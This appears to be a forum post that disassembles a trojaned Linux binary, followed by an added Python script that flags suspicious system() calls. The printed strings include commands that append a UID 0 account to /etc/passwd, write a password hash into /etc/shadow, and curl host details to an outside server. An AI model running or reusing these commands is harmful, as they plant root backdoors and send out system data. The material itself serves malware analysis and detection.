Old 08-28-07, 12:21 PM   #4
evilghost
Registered User
 
Join Date: Jul 2005
Posts: 3,606
Default Re: Watch what you trust.

When disassembling, these are the things to look for; note the system calls:

Code:
0x08048feb <main+262>:  call   0x8048628 <system@plt>
0x08048ff0 <main+267>:  movl   $0x8049534,(%esp)
0x08048ff7 <main+274>:  call   0x8048628 <system@plt>
0x08048ffc <main+279>:  movl   $0x8049588,(%esp)
0x08049003 <main+286>:  call   0x8048628 <system@plt>
0x08049008 <main+291>:  movl   $0x80495bc,(%esp)
0x0804900f <main+298>:  call   0x8048628 <system@plt>
0x08049014 <main+303>:  movl   $0x8049468,0x4(%esp)
And now, what they do:

Code:
(gdb) x/s 0x80495bc
0x80495bc <__dso_handle+1036>:   "echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd"
(gdb) x/s 0x8049534
0x8049534 <__dso_handle+900>:    "echo newbie:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"
(gdb) x/s 0x8049588
0x8049588 <__dso_handle+984>:    "echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd"
(gdb) x/s 0x80495bc
0x80495bc <__dso_handle+1036>:   "echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd"
(gdb) x/s 0x804960c
0x804960c <__dso_handle+1116>:   "/usr/bin/curl -d \"user=newbie&pass=novice&target=$(ifconfig -a)\" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null"
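As an added illustration (not evilghost's code, and not part of the original post), the pattern above can be turned into a small static-triage script: walk AT&T-syntax disassembly, pair each `call <system@plt>` with the immediate that was just stored at `(%esp)`, resolve that address against a string table, and tag the resulting shell command by what it does. The disassembly lines and the string table below are constructed from what the post shows; the tag names and the heuristics (append to passwd/shadow, new UID 0 entry, outbound curl/wget) are my own assumptions, not anything from the binary itself.

```python
import re

# Constructed sample: the disassembly lines quoted in the post above.
DISASM = """\
0x08048feb <main+262>:  call   0x8048628 <system@plt>
0x08048ff0 <main+267>:  movl   $0x8049534,(%esp)
0x08048ff7 <main+274>:  call   0x8048628 <system@plt>
0x08048ffc <main+279>:  movl   $0x8049588,(%esp)
0x08049003 <main+286>:  call   0x8048628 <system@plt>
0x08049008 <main+291>:  movl   $0x80495bc,(%esp)
0x0804900f <main+298>:  call   0x8048628 <system@plt>
0x08049014 <main+303>:  movl   $0x8049468,0x4(%esp)
"""

# Constructed string table, transcribed from the gdb x/s output in the post
# (the backslashes are the literal bytes stored in the binary).
STRINGS = {
    0x8049534: r"echo newbie:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow",
    0x8049588: r"echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd",
    0x80495bc: r"echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd",
    0x804960c: r'/usr/bin/curl -d "user=newbie&pass=novice&target=$(ifconfig -a)" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null',
}

# "movl $imm,(%esp)" sets the first (and only) argument of a cdecl call on i386.
MOV_ESP = re.compile(r'^(0x[0-9a-f]+)\s+<[^>]*>:\s+movl\s+\$(0x[0-9a-f]+),\(%esp\)\s*$')
CALL_SYSTEM = re.compile(r'^(0x[0-9a-f]+)\s+<[^>]*>:\s+call\s+0x[0-9a-f]+\s+<system@plt>\s*$')


def find_system_calls(disasm):
    """Return [(call_address, argument_address_or_None), ...] for every
    call to system@plt. The argument is only known when the immediately
    preceding instruction stored an immediate at (%esp)."""
    calls = []
    pending = None
    for line in disasm.splitlines():
        line = line.strip()
        if not line:
            continue
        m = MOV_ESP.match(line)
        if m:
            pending = int(m.group(2), 16)
            continue
        c = CALL_SYSTEM.match(line)
        if c:
            calls.append((int(c.group(1), 16), pending))
        pending = None  # any other instruction invalidates the pairing
    return calls


def classify_command(cmd):
    """Tag a shell command string with coarse behavioural heuristics
    (assumed heuristics, not an exhaustive classifier)."""
    tags = set()
    if re.search(r'>>\s*/etc/passwd\b', cmd):
        tags.add('passwd-append')
    if re.search(r'>>\s*/etc/shadow\b', cmd):
        tags.add('shadow-append')
    # If the command echoes a passwd-style record, check the UID field.
    m = re.match(r'echo\s+(\S+)', cmd)
    if m:
        fields = m.group(1).split(':')
        if len(fields) >= 3 and fields[2] == '0':
            tags.add('uid0-account')
    if re.search(r'\b(curl|wget)\b', cmd):
        tags.add('outbound-http')
    return sorted(tags)


def triage(disasm, strings):
    """Combine the two steps: [(call_address, command_or_None, tags), ...]."""
    report = []
    for call_addr, arg in find_system_calls(disasm):
        cmd = strings.get(arg) if arg is not None else None
        tags = classify_command(cmd) if cmd else []
        report.append((call_addr, cmd, tags))
    return report


if __name__ == "__main__":
    for call_addr, cmd, tags in triage(DISASM, STRINGS):
        print(f"{call_addr:#010x}: {cmd!r} {tags}")
```

The first `system()` call in the snippet has no resolvable argument because the `movl` that set it is above the quoted lines, so the script reports it as unknown rather than guessing; in a real triage pass you would resolve the remaining addresses the same way the post does with `x/s`.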